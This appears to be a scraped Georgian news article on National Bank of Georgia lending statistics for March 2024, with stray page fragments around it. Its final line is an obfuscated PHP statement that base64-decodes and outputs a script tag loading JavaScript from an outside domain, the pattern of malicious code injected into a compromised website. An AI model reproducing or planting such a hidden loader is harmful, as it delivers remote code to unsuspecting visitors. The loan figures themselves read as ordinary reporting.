celsiusi
ავერსი შნაიდერი

საქართველოს ეროვნული ბანკის ინფორმაციით, კომერციული ბანკების მიერ გაცემული სესხების მოცულობა, 2024 წლის მარტში, წინა თვესთან შედარებით, 1.54 მლრდ ლარით, ანუ 2.94%-ით გაიზარდა და მარტის ბოლოს 53.78 მლრდ ლარი შეადგინა.

ეროვნული ბანკის ცნობით, ამავე პერიოდში ეროვნული ვალუტით გაცემული სესხების მოცულობა 562.23 მლნ ლარით, ანუ 1.93%-ით, ხოლო უცხოური ვალუტით გაცემული სესხების მოცულობა 974.63 მლნ ლარით, ანუ 4.22%-ით გაიზარდა.

ამასთან, ცენტრალური ბანკის მონაცემებით, რეზიდენტი იურიდიული პირებისათვის 2024 წლის მარტის ბოლოს კომერციულ ბანკებს ეროვნული ვალუტით გაცემული ჰქონდათ 8.84 მლრდ ლარის მოცულობის სესხი, რაც წინა თვესთან შედარებით 2.27%-ით მეტია, ხოლო უცხოური ვალუტით – 15.21 მლრდ ლარის მოცულობის სესხი, რაც წინა თვის მაჩვენებლებს 5.19%-ით აღემატება.

ეროვნული ბანკის ანგარიშის მიხედვით, 2024 წლის მარტის განმავლობაში 2.00%-ით, ანუ 547.91 მლნ ლარით გაიზარდა რეზიდენტი შინამეურნეობების სექტორის დაკრედიტების მოცულობა და მარტის ბოლოსათვის 27.93 მლრდ ლარი შეადგინა. 2024 წლის მარტის ბოლოსათვის მთლიანი სესხების ლარიზაციის კოეფიციენტმა 55.20 პროცენტი შეადგინა. წინა თვის ბოლო მდგომარეობასთან შედარებით, შემცირდა 0.55 პროცენტული პუნქტით.

183
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");